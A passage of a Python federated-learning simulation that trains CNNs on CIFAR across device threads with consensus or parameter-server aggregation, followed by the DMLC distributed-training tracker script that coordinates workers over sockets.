# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1 # consensus max delay 2= 2 epochs max
refresh_server = 1 # refresh server updates (in sec)
validation_start = 1 # start validation in epochs
# Using huber loss for stability
loss_function = keras.losses.Huber()
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
# def get_noniid_data(total_training_size, devices, batch_size):
# samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
# devices) # create random numbers
# samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# # Ignore the following if you don't need integers
# samples = np.round(samples) # transform them into integers
# remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
# step = 1 if remainings > 0 else -1
# while remainings != 0:
# i = np.random.randint(devices)
# if samples[i] + step >= 0:
# samples[i] += step
# remainings -= step
# return samples
# ####
def preprocess_observation(obs, batch_size):
img = obs# crop and downsize
img = (img).astype(np.float)
return img.reshape(batch_size, 32, 32, 3)
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(32, 32, 3,))
if condition == 0:
# VGG 1 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4)
classification = layers.Dense(n_outputs, activation="linear")(layer5)
elif condition == 1:
# VGG 2 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Flatten()(layer6)
layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7)
classification = layers.Dense(n_outputs, activation="linear")(layer8)
else:
# VGG 3 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer6)
layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer7)
layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8)
layer10 = layers.Flatten()(layer9)
layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10)
classification = layers.Dense(n_outputs, activation="linear")(layer11)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
# classification = layers.Dense(n_outputs, activation="linear")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
outfile_models_grad = 'results/dump_train_grad{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
#np.random.seed(1)
#tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
model_transmitted = create_q_model()
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
model_transmitted = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
#a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
#optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
#optimizer2 = keras.optimizers.SGD(learning_rate=args.mu2)
optimizer2 = keras.optimizers.Adam(learning_rate=args.mu2, clipnorm=1.0)
# create a data object (here radar data)
# start = time.time()
if args.noniid_assignment == 1:
data_handle = CIFARData_task(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
else:
data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# end = time.time()
# time_count = (end - start)
# print(Training time"time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Local learning update every "number of batches" batches
# time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
#end = time.time()
#time_count = time_count + (end-start)/number_of_batches
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
cfa_consensus.update_local_model(model_weights)
grads_v = []
for d in range(len(grads)):
grads_v.append(grads[d].numpy())
grads_v = np.asarray(grads_v)
cfa_consensus.update_local_gradient(grads_v)
# compute gradients for selected neighbors in get_tx_connectvity, obtain a new test observation from local database
obs_t, labels_t = data_handle.getTrainingData(batch_size)
data_batch_t = preprocess_observation(obs_t, batch_size)
masks_t = tf.one_hot(labels_t, n_outputs)
gradient_neighbor = cfa_consensus.get_tx_connectivity(device_index, args.N, devices)
outfile_n = 'results/dump_train_variables{}.npz'.format(gradient_neighbor)
outfile_models_n = 'results/dump_train_model{}.npy'.format(gradient_neighbor)
neighbor_model_for_gradient, success = cfa_consensus.get_neighbor_weights(epoch_count, outfile_n, outfile_models_n, epoch=0, max_lag=1)
if success:
model_transmitted.set_weights(neighbor_model_for_gradient.tolist())
else:
print("failed retrieving the model for gradient computation")
with tf.GradientTape() as tape2:
# Train the model on data samples
classes = model_transmitted(data_batch_t)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks_t), axis=1)
# Calculate loss
loss = loss_function(labels_t, class_v)
# getting and save neighbor gradients
grads_t = tape2.gradient(loss, model_transmitted.trainable_variables)
grads_v = []
for d in range(len(grads_t)):
grads_v.append(grads_t[d].numpy())
grads_v = np.asarray(grads_v)
np.save(outfile_models_grad, grads_v)
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if not train_start:
if federated and not training_signal:
eps_c = args.eps
# apply consensus for model parameter
neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
#if args.gradients == 0 or running_loss < 0.5:
if args.gradients == 0:
# random selection of neighor
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
# while neighbor == device_index:
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
# replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
training_signal = True # stop local learning, just do validation
else:
# compute gradients as usual
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
print("Applying gradient updates...")
# model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
model_averaging = cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag)
model.set_weights(model_averaging)
if cfa_consensus.getTrainingStatusFromNeightbor():
# model.set_weights(model_averaging)
training_signal = True # stop local learning, just do validation
else:
grads = cfa_consensus.federated_grads_computing(neighbor, args.N, epoch_count, args.eps_grads, max_lag)
optimizer2.apply_gradients(zip(grads, model.trainable_variables))
else:
print("Warm up")
train_start = False
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}_gradients{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution, args.gradients), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}_gradients{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution, args.gradients), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
# ######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return ''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s)
def recvstr(self):
slen = self.recvint()
return self.recvall(slen)
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in xrange(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno == 98:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank / 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) / 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = range(nslave)
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True)), args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 0))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
